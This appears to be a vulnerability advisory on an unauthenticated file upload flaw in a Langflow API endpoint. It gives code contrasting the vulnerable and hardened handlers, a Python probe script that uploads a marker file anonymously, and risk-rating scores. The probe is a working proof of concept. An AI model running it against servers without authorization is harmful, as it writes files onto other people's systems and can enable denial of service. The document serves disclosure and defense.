Langflow Unauthenticated File Upload Vulnerability in API Endpoint

Vulnerability

An unrestricted file upload vulnerability has been identified in Langflow versions through 1.1.0. The issue arises from a deprecated API endpoint that performs neither authentication nor ownership validation, so any remote user can upload files to the server under any flow id. The vulnerable code is the 'create_upload_file' function in 'src/backend/base/langflow/api/v1/endpoints.py'. Because nothing limits who may upload or how much, an attacker can fill the server's disk space or exhaust its inodes, causing a denial of service.
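The missing checks, modelled as an added example rather than Langflow's own code: a plain-Python stand-in for the upload handler, with the flawed version beside a hardened one that requires a bearer token, verifies that the caller owns the flow, and caps the upload size. The `Store`, `UploadRequest` and `HTTPError` types, the token table and `MAX_UPLOAD_BYTES` are assumptions made for illustration and do not correspond to Langflow internals.

```python
import os
from dataclasses import dataclass
from typing import Dict, Optional

# Assumed cap for the hardened handler; the page names no limit and this is not a Langflow setting.
MAX_UPLOAD_BYTES = 10 * 1024 * 1024


class HTTPError(Exception):
    """Stand-in for a web framework's HTTP exception (status code plus detail)."""

    def __init__(self, status: int, detail: str):
        super().__init__(detail)
        self.status = status
        self.detail = detail


@dataclass
class UploadRequest:
    flow_id: str
    filename: str
    content: bytes
    bearer_token: Optional[str] = None  # None models an unauthenticated caller


@dataclass
class Store:
    """Constructed stand-in for application state (not Langflow's database layer)."""
    tokens: Dict[str, str]       # bearer token -> user id
    flow_owners: Dict[str, str]  # flow id -> owning user id
    upload_dir: str


def save_file(store: Store, flow_id: str, filename: str, content: bytes) -> str:
    """Write the upload under <upload_dir>/<flow_id>/ and return the resulting path."""
    safe_name = os.path.basename(filename)  # keep the file name, drop any directory part
    target_dir = os.path.join(store.upload_dir, flow_id)
    os.makedirs(target_dir, exist_ok=True)
    path = os.path.join(target_dir, safe_name)
    with open(path, "wb") as fh:
        fh.write(content)
    return path


def create_upload_file_vulnerable(req: UploadRequest, store: Store) -> str:
    """Model of the flaw described above: anyone can upload to any flow id, at any size."""
    return save_file(store, req.flow_id, req.filename, req.content)


def create_upload_file_hardened(req: UploadRequest, store: Store) -> str:
    """The same operation with the checks the deprecated endpoint lacked."""
    # 1. Authentication: reject anonymous or unknown callers before touching disk.
    if req.bearer_token is None or req.bearer_token not in store.tokens:
        raise HTTPError(401, "authentication required")
    user = store.tokens[req.bearer_token]

    # 2. Ownership: the flow must exist and belong to the caller. Both failures get
    #    the same 404 so a caller cannot enumerate other users' flow ids.
    if store.flow_owners.get(req.flow_id) != user:
        raise HTTPError(404, "flow not found")

    # 3. Resource cap: bounds the disk cost of a single request.
    if len(req.content) > MAX_UPLOAD_BYTES:
        raise HTTPError(413, "file too large")

    return save_file(store, req.flow_id, req.filename, req.content)


def hardened_status(req: UploadRequest, store: Store) -> int:
    """Run the hardened handler and return the HTTP status it would produce."""
    try:
        create_upload_file_hardened(req, store)
    except HTTPError as exc:
        return exc.status
    return 200
```

The per-request size cap limits how much one upload can consume, but it does not stop a caller from exhausting inodes with many small files; a per-user storage quota and a rate limit on the endpoint are still needed for the denial-of-service case the advisory describes.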

Impact

Exploitation causes a denial-of-service condition by exhausting server disk space or inodes. It also lets unauthenticated users place arbitrary files on the server, which could be used to stage malware there.

Reproduction

The vulnerability can be reproduced by sending a POST request to the '/api/v1/upload/{flow_id}' endpoint with a file attached as multipart form data; a short Python script can automate the upload. The endpoint accepts the file without any authentication and without checking that the caller owns the flow, and the uploaded file is saved on the server.
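A stdlib-only probe for the upload described above, written as an added example (not the original reporter's script and not Langflow code). It builds the multipart POST with no Authorization header or API key, sends it to '/api/v1/upload/{flow_id}', and reports whether the server accepted it. Assumptions: the handler reads the upload from a form field named 'file', a 200 or 201 response means the file was stored, a 401 or 403 means authentication is now enforced, and the host name in the usage line is a placeholder.

```python
import sys
import urllib.error
import urllib.request
import uuid
from typing import Tuple

# Assumed name of the multipart field the handler reads the upload from.
FIELD_NAME = "file"


def build_multipart(field_name: str, filename: str, content: bytes,
                    content_type: str = "application/octet-stream") -> Tuple[str, bytes]:
    """Return (boundary, body) for a single-file multipart/form-data request."""
    boundary = "----langflow-probe-" + uuid.uuid4().hex
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field_name}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode()
    tail = f"\r\n--{boundary}--\r\n".encode()
    return boundary, head + content + tail


def build_upload_request(base_url: str, flow_id: str, filename: str,
                         content: bytes) -> urllib.request.Request:
    """Build the POST exactly as an anonymous client would send it: no credentials at all."""
    boundary, body = build_multipart(FIELD_NAME, filename, content)
    url = f"{base_url.rstrip('/')}/api/v1/upload/{flow_id}"
    headers = {"Content-Type": f"multipart/form-data; boundary={boundary}"}
    return urllib.request.Request(url, data=body, headers=headers, method="POST")


def interpret_status(status: int) -> str:
    """Map the HTTP status to a verdict (the status meanings are assumptions, see lead-in)."""
    if status in (200, 201):
        return "accepted without authentication: vulnerable"
    if status in (401, 403):
        return "rejected: authentication enforced"
    if status == 404:
        return "endpoint not present (removed, or a different version)"
    return f"inconclusive (HTTP {status})"


def probe(base_url: str, flow_id: str, timeout: float = 10.0) -> Tuple[int, str]:
    """Send one marker file and return (status, verdict). Performs a real network request."""
    marker = f"probe-{uuid.uuid4().hex}.txt"  # unique name so the file can be found and removed
    req = build_upload_request(base_url, flow_id, marker, b"unauthenticated upload probe\n")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            status = resp.status
    except urllib.error.HTTPError as exc:
        status = exc.code
    return status, interpret_status(status)


if __name__ == "__main__":
    # Placeholder target; replace with an instance you are authorized to test.
    base = sys.argv[1] if len(sys.argv) > 1 else "http://langflow.local:7860"
    flow = sys.argv[2] if len(sys.argv) > 2 else "00000000-0000-0000-0000-000000000000"
    print(probe(base, flow))
```

A successful probe writes a real file on the target, so run it only against instances you are authorized to test, and use the random marker name to locate and delete the file afterwards. Anything other than the listed statuses (for example a 422 validation error) is reported as inconclusive rather than as a pass.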

Added: Apr 20, 2026, 3:20 AM
Updated: Apr 20, 2026, 3:20 AM

Vulnerability Rating

Custom Algorithm
spread: 0.0
impact: 0.8
exploitability: 8.7
remediation: 0.0
relevance: 6.3
threat: 6.4
urgency: 2.9
incentive: 4.2

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.